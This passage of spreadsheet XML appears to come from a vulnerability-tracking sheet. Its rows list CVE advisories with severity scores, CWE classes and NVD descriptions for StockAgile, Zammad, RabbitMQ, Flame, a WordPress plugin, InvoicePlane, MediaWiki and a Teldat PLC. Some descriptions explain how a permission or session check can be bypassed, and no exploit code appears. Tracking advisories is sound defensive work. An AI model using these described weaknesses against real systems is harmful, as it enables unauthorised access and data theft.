          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P374" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q374" s="5" t="inlineStr"/>
      <c r="R374" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S374" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) vulnerability in StockAgile API and management panel. The vulnerability is present on the server side in REST endpoint '/inventory/configuration/variants' that allow the injection and persistence of malicious JavaScript code through parameters such as ‘code’, ‘name’, and other text fields. The scripts that are entered are not filtered or validated correctly before being displayed on the web panel that authenticated users can access. Exploiting this vulnerability could allow a remote, previously authenticated attacker to execute arbitrary JavaScript code.</t>
        </is>
      </c>
      <c r="T374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6084</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6085</t>
        </is>
      </c>
      <c r="D375" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E375" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F375" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I375" s="5" t="inlineStr"/>
      <c r="J375" s="5" t="inlineStr"/>
      <c r="K375" s="5" t="inlineStr"/>
      <c r="L375" s="5" t="inlineStr"/>
      <c r="M375" s="5" t="inlineStr"/>
      <c r="N375" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O375" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P375" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q375" s="5" t="inlineStr"/>
      <c r="R375" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S375" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) vulnerability in StockAgile API and management panel. The vulnerability is present on the server side in REST endpoint '/inventory/configuration/serial-number-types' that allow the injection and persistence of malicious JavaScript code through parameters such as ‘code’, ‘name’, and other text fields. The scripts that are entered are not filtered or validated correctly before being displayed on the web panel that authenticated users can access. Exploiting this vulnerability could allow a remote, previously authenticated attacker to execute arbitrary JavaScript code.</t>
        </is>
      </c>
      <c r="T375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6085</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6086</t>
        </is>
      </c>
      <c r="D376" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E376" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F376" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I376" s="5" t="inlineStr"/>
      <c r="J376" s="5" t="inlineStr"/>
      <c r="K376" s="5" t="inlineStr"/>
      <c r="L376" s="5" t="inlineStr"/>
      <c r="M376" s="5" t="inlineStr"/>
      <c r="N376" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O376" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P376" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q376" s="5" t="inlineStr"/>
      <c r="R376" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S376" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) vulnerability in StockAgile API and management panel. The vulnerability is present on the server side in REST endpoint '/inventory/configuration/serial-number-types' that allow the injection and persistence of malicious JavaScript code through parameters such as ‘code’, ‘name’, and other text fields. The scripts that are entered are not filtered or validated correctly before being displayed on the web panel that authenticated users can access. Exploiting this vulnerability could allow a remote, previously authenticated attacker to execute arbitrary JavaScript code.</t>
        </is>
      </c>
      <c r="T376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6086</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6087</t>
        </is>
      </c>
      <c r="D377" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E377" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F377" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I377" s="5" t="inlineStr"/>
      <c r="J377" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K377" s="5" t="inlineStr"/>
      <c r="L377" s="5" t="inlineStr"/>
      <c r="M377" s="5" t="inlineStr"/>
      <c r="N377" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O377" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P377" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q377" s="5" t="inlineStr"/>
      <c r="R377" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S377" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) vulnerability in StockAgile API and management panel. The vulnerability is present on the server side in REST endpoint '/inventory/configuration/categories' that allow the injection and persistence of malicious JavaScript code through parameters such as ‘code’, ‘name’, and other text fields. The scripts that are entered are not filtered or validated correctly before being displayed on the web panel that authenticated users can access. Exploiting this vulnerability could allow a remote, previously authenticated attacker to execute arbitrary JavaScript code.</t>
        </is>
      </c>
      <c r="T377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6087</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6088</t>
        </is>
      </c>
      <c r="D378" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E378" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F378" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I378" s="5" t="inlineStr"/>
      <c r="J378" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K378" s="5" t="inlineStr"/>
      <c r="L378" s="5" t="inlineStr"/>
      <c r="M378" s="5" t="inlineStr"/>
      <c r="N378" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O378" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P378" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q378" s="5" t="inlineStr"/>
      <c r="R378" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S378" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) vulnerability in StockAgile API and management panel. The vulnerability is present on the server side in REST endpoint '/inventory/configuration/categories' that allow the injection and persistence of malicious JavaScript code through parameters such as ‘code’, ‘name’, and other text fields. The scripts that are entered are not filtered or validated correctly before being displayed on the web panel that authenticated users can access. Exploiting this vulnerability could allow a remote, previously authenticated attacker to execute arbitrary JavaScript code.</t>
        </is>
      </c>
      <c r="T378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6088</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63205</t>
        </is>
      </c>
      <c r="D379" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E379" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F379" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="inlineStr"/>
      <c r="I379" s="5" t="inlineStr"/>
      <c r="J379" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K379" s="5" t="inlineStr"/>
      <c r="L379" s="5" t="inlineStr"/>
      <c r="M379" s="5" t="inlineStr"/>
      <c r="N379" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O379" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P379" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q379" s="5" t="inlineStr"/>
      <c r="R379" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="S379" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, when creating or updating an email signature, Zammad processes inline images referenced in the signature body. If a signature body contains an HTML img tag pointing to any existing attachment, the system copies that attachment into a new signature-owned record, without checking whether the user has permission to access the original attachment. The newly created copy is then downloadable by the same channel-admin user, because attachment access is determined by the copy's owner (the signature), not the original object (e.g., a ticket or knowledge-base article). This allows a user with any of the admin.channel_email, admin.channel_google, admin.channel_microsoft365, or admin.channel_microsoft_graph permissions to read attachments they would otherwise be denied access to, such as ticket attachments belonging to groups they are not a member of. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63205</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63208</t>
        </is>
      </c>
      <c r="D380" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E380" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F380" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G380" s="5" t="inlineStr"/>
      <c r="H380" s="5" t="inlineStr"/>
      <c r="I380" s="5" t="inlineStr"/>
      <c r="J380" s="5" t="inlineStr"/>
      <c r="K380" s="5" t="inlineStr"/>
      <c r="L380" s="5" t="inlineStr"/>
      <c r="M380" s="5" t="inlineStr"/>
      <c r="N380" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O380" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P380" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q380" s="5" t="inlineStr"/>
      <c r="R380" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-532</t>
        </is>
      </c>
      <c r="S380" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, when a Microsoft Graph request fails, Zammad logs the error including the authentication token used to access the mailbox. The system attempts to hide this token in the log, but the masking is incomplete: for the token format Microsoft uses (JWT), only the first part is hidden, while the remaining parts remain readable in plain text. A Zammad admin with Microsoft Graph channel access can view these logs and see the partial token, which may reveal sensitive claims such as the account scope, tenant, or timing, and could assist in reconstructing the full token while it is still valid. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63208</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67407</t>
        </is>
      </c>
      <c r="D381" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E381" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F381" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="inlineStr"/>
      <c r="I381" s="5" t="inlineStr"/>
      <c r="J381" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K381" s="5" t="inlineStr"/>
      <c r="L381" s="5" t="inlineStr"/>
      <c r="M381" s="5" t="inlineStr"/>
      <c r="N381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O381" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P381" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q381" s="5" t="inlineStr"/>
      <c r="R381" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S381" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.0.0 until 4.3.3 and 4.2.9 and 4.1.14 and 4.0.23, Incomplete fix for CVE-2026-44838: escaperegexchar/1 does not escape -, leaving room for an MQTT topic permission bypass. the CVE-2026-44838 fix made expandtopicpermission/2 escape regex metacharacters in expanded topic-permission variables (escaperegex(V)), but escaperegexchar/1 escapes \ ^ $ . | ? + ( ) [ ] { } and omits -. When a topic permission template places {clientid} inside a [...] character class A low-privileged authenticated MQTT user controlling its clientid can broaden topic authorization (read and write) when templates embed {clientid} in a [...] This issue is fixed in versions 4.3.3 and 4.2.9 and 4.1.14 and 4.0.23.</t>
        </is>
      </c>
      <c r="T381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67407</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100502</t>
        </is>
      </c>
      <c r="D382" s="5" t="n">
        <v>5</v>
      </c>
      <c r="E382" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="inlineStr"/>
      <c r="I382" s="5" t="inlineStr"/>
      <c r="J382" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K382" s="5" t="inlineStr"/>
      <c r="L382" s="5" t="inlineStr"/>
      <c r="M382" s="5" t="inlineStr"/>
      <c r="N382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O382" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P382" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q382" s="5" t="inlineStr"/>
      <c r="R382" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="S382" s="5" t="inlineStr">
        <is>
          <t>Flame through 2.4.0 contains an insufficient session expiration vulnerability in the login endpoint that allows attackers with former admin access to obtain tokens with arbitrary lifespans by supplying unvalidated duration parameters. Attackers can mint near-permanent administrator tokens that survive password changes, retaining full control of the dashboard since tokens are verified only against a static JWT secret that is never rotated.</t>
        </is>
      </c>
      <c r="T382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100502</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17602</t>
        </is>
      </c>
      <c r="D383" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E383" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F383" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G383" s="5" t="inlineStr"/>
      <c r="H383" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I383" s="5" t="inlineStr"/>
      <c r="J383" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K383" s="5" t="inlineStr"/>
      <c r="L383" s="5" t="inlineStr"/>
      <c r="M383" s="5" t="inlineStr"/>
      <c r="N383" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O383" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P383" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q383" s="5" t="inlineStr"/>
      <c r="R383" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S383" s="5" t="inlineStr">
        <is>
          <t>The SSL Zen — SSL Certificate Installer &amp; HTTPS Redirects plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 4.7.42 via the 'file_name' parameter parameter. This makes it possible for authenticated attackers, with administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.</t>
        </is>
      </c>
      <c r="T383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17602</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39372</t>
        </is>
      </c>
      <c r="D384" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E384" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F384" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G384" s="5" t="inlineStr"/>
      <c r="H384" s="5" t="inlineStr"/>
      <c r="I384" s="5" t="inlineStr"/>
      <c r="J384" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K384" s="5" t="inlineStr"/>
      <c r="L384" s="5" t="inlineStr"/>
      <c r="M384" s="5" t="inlineStr"/>
      <c r="N384" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O384" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P384" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q384" s="5" t="inlineStr"/>
      <c r="R384" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-359</t>
        </is>
      </c>
      <c r="S384" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane stores and serves uploaded image attachments without stripping EXIF metadata. When an administrator uploads an image through invoice attachments, quote attachments, or another attachment feature and shares it with another user, the recipient can retrieve embedded GPS coordinates, timestamps, and device information. The preserved metadata can disclose private location and device details across users. This vulnerability is fixed in 1.7.2.</t>
        </is>
      </c>
      <c r="T384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39372</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B385" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100376</t>
        </is>
      </c>
      <c r="D385" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E385" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F385" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G385" s="5" t="inlineStr"/>
      <c r="H385" s="5" t="inlineStr"/>
      <c r="I385" s="5" t="inlineStr"/>
      <c r="J385" s="5" t="inlineStr"/>
      <c r="K385" s="5" t="inlineStr"/>
      <c r="L385" s="5" t="inlineStr"/>
      <c r="M385" s="5" t="inlineStr"/>
      <c r="N385" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O385" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P385" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q385" s="5" t="inlineStr"/>
      <c r="R385" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S385" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation Mediawiki - TemplateSandbox Extension allows Cross-Site Scripting (XSS).
This issue affects Mediawiki - TemplateSandbox Extension: from * before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100376</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B386" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100383</t>
        </is>
      </c>
      <c r="D386" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E386" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F386" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G386" s="5" t="inlineStr"/>
      <c r="H386" s="5" t="inlineStr"/>
      <c r="I386" s="5" t="inlineStr"/>
      <c r="J386" s="5" t="inlineStr"/>
      <c r="K386" s="5" t="inlineStr"/>
      <c r="L386" s="5" t="inlineStr"/>
      <c r="M386" s="5" t="inlineStr"/>
      <c r="N386" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O386" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P386" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q386" s="5" t="inlineStr"/>
      <c r="R386" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S386" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation Mediawiki - WikiLambda Extension allows Cross-Site Scripting (XSS).
This issue affects Mediawiki - WikiLambda Extension: 1.47.0-alpha. The issue has been remediated on the `master` branch.</t>
        </is>
      </c>
      <c r="T386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100383</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B387" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27867</t>
        </is>
      </c>
      <c r="D387" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E387" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F387" s="5" t="inlineStr">
        <is>
          <t>ffb98d57-deaa-4918-a669-5225ccc13e39</t>
        </is>
      </c>
      <c r="G387" s="5" t="inlineStr"/>
      <c r="H387" s="5" t="inlineStr"/>
      <c r="I387" s="5" t="inlineStr"/>
      <c r="J387" s="5" t="inlineStr"/>
      <c r="K387" s="5" t="inlineStr"/>
      <c r="L387" s="5" t="inlineStr"/>
      <c r="M387" s="5" t="inlineStr"/>
      <c r="N387" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O387" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P387" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q387" s="5" t="inlineStr"/>
      <c r="R387" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S387" s="5" t="inlineStr">
        <is>
          <t>An attacker with access via network to the Regesta Smart HD-PLC of the provider Teldat (in this case, registration action is required) who has the vulnerable firmware version could inject
a specific payload via the parameter "cmdcookie" withing the /upgrade/index.html resulting in to a Cross-Site Scripting (XSS). This issue affects Regesta Smart HD-PLC - TLDPH16D2: 
11.02.06.00.02</t>
        </is>
      </c>
      <c r="T387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27867</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B388" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67241</t>
        </is>
      </c>
      <c r="D388" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E388" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F388" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G388" s="5" t="inlineStr"/>
      <c r="H388" s="5" t="inlineStr"/>
      <c r="I388" s="5" t="inlineStr"/>
      <c r="J388" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K388" s="5" t="inlineStr"/>
      <c r="L388" s="5" t="inlineStr"/>
      <c r="M388" s="5" t="inlineStr"/>
      <c r="N388" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O388" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P388" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q388" s="5" t="inlineStr"/>
      <c r="R388" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S388" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.2.0 until 4.2.9 and 4.3.3, AMQP 1.0 management exchange.declare skips alternate-exchange permission check. pUT /exchanges/:name (lines 192-240) checks only configure on the declared exchange and passes XArgs straight to rabbitexchange:declare/7. It omits the checkreadpermitted(X) + checkwritepermitted(AE) that rabbitchannel.erl:2540-2548 enforces for the alternate-exchange argument on the AMQP 0-9-1 path. The same file already implements the analogous DLX check for queues (lines 708-719), confirming this is a missing-check bug rather than intentional A user with only configure on exchange X can route X's unroutable messages into an alternate exchange they have no write permission AMQP 1.0 enabled (default in RabbitMQ 4.x) Attacker has configure on at least one exchange but lacks write on the target. This issue is fixed in versions 4.2.9 and 4.3.3.</t>
        </is>
      </c>
      <c r="T388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67241</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B389" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85292</t>
        </is>
      </c>
      <c r="D389" s="5" t="n">
        <v>4.8</v>
      </c>
